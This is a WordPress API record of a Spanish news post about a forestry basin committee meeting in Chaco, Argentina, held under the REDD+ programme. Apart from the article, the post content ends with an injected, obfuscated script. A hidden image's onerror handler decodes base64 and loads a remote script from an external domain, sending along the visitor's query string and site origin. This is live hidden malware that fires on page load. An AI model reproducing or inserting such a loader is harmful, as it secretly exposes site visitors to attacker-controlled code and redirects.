{"id":8417,"date":"2024-07-15T21:06:02","date_gmt":"2024-07-16T00:06:02","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8417"},"modified":"2025-08-13T15:41:37","modified_gmt":"2025-08-13T18:41:37","slug":"ambiente-nacion-fue-parte-de-la-segunda-reunion-del-comite-de-cuenca-del-impenetrable","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8417","title":{"rendered":"Ambiente Naci\u00f3n fue parte de la segunda reuni\u00f3n del Comit\u00e9 de Cuenca del Impenetrable"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-860f2bcebccf5528a48d408868501042\" style=\"background-color:#055c8f\"><em>El encuentro tuvo como objetivo continuar con el abordaje de estrategias integrales para el manejo sostenible de recursos.<\/em><\/h3>\n\n\n\n<p>El director de Bosques de la Subsecretar\u00eda de Ambiente, Octavio P\u00e9rez Pardo, particip\u00f3 en el d\u00eda de ayer de la segunda reuni\u00f3n del Comit\u00e9 de Cuenca del Impenetrable.<\/p>\n\n\n\n<p>Durante la reuni\u00f3n, que presidi\u00f3 Jorge Frank, Subsecretario de Desarrollo Forestal, el comit\u00e9 aprob\u00f3 como equipo t\u00e9cnico formulador del plan de cuenca forestal al gobierno de la provincia del Chaco que se comprometi\u00f3 a convocar a un grupo multidisciplinario. Adem\u00e1s, se autoriz\u00f3 la incorporaci\u00f3n del Instituto Nacional de Asuntos Ind\u00edgenas (INAI) como integrante del comit\u00e9 de cuenca y de la Asociaci\u00f3n Cultural para el Desarrollo Integral (ACDI) como miembro participante.<\/p>\n\n\n\n<p>Se trata de una de las cuencas forestales que Ambiente, junto a la Organizaci\u00f3n de las Naciones Unidas para la Alimentaci\u00f3n y la Agricultura (FAO) coejecutan en el marco del Proyecto Pago por Resultados REDD+.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"563\" data-id=\"8418\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-1024x563.jpeg\" alt=\"\" class=\"wp-image-8418\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-1024x563.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-300x165.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-768x422.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-1536x844.jpeg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-696x382.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-1068x587.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-765x420.jpeg 765w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-320x176.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-480x264.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41-800x440.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"563\" data-id=\"8419\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-1024x563.jpeg\" alt=\"\" class=\"wp-image-8419\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-1024x563.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-300x165.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-768x422.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-1536x844.jpeg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-696x382.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-1068x587.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-765x420.jpeg 765w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-320x176.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-480x264.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1-800x440.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/07\/whatsapp_image_2024-07-12_at_15.38.41_1.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Previamente, el director de bosques recorri\u00f3 una de las carpinterias industriales mas grande del Chaco, ubicada en la Ciudad de Castelli, donde se generan productos con maderas nativas.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes el coordinador general del proyecto REDD+ Francisco Yofre, el coordinador de Cuencas Forestales, Rolando Teves y la responsable de la Regional, Julieta Carbajal, entre otros.<\/p>\n\n\n\n<p>Asimismo, cont\u00f3 con la presencia de representantes de la intendencia municipal de Castelli, la intendencia municipal de Tres Isletas, la Asociaci\u00f3n de Productores Forestales e Industriales, el Instituto del Aborigen Chaque\u00f1o, la Asociaci\u00f3n de Productores Forestales de Castelli, el Centro de Desarrollo Tecnol\u00f3gico de la Industria de la Madera (CEDETEMA), el Consejo Profesional de Ingeniero Agr\u00f3nomos del Chaco, la Uni\u00f3n Argentina de Trabajadores Rurales y Estibadores (UATRE), la Secretar\u00eda de Desarrollo Forestal, el Consejo de Profesionales de Ciencias Forestales de Chaco, la Direcci\u00f3n de Bosques de la provincia, la Asociaci\u00f3n Comunitaria Meguesoxochi, la empresa UNITAN, la Direcci\u00f3n Nacional de Desarrollo Foresto-Industrial y el Instituto Nacional de Asuntos Ind\u00edgenas (CPI &#8211; Chaco).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/ambiente-nacion-fue-parte-de-la-segunda-reunion-del-comite-de-cuenca-del-impenetrable\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:274px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El encuentro tuvo como objetivo continuar con el abordaje de estrategias integrales para el manejo sostenible de recursos. El director de Bosques de la Subsecretar\u00eda de Ambiente, Octavio P\u00e9rez Pardo, particip\u00f3 en el d\u00eda de ayer de la segunda reuni\u00f3n del Comit\u00e9 de Cuenca del Impenetrable. Durante la reuni\u00f3n, que presidi\u00f3 Jorge Frank, Subsecretario de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8430,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-8417","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8417","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8417"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8417\/revisions"}],"predecessor-version":[{"id":10130,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8417\/revisions\/10130"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8430"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}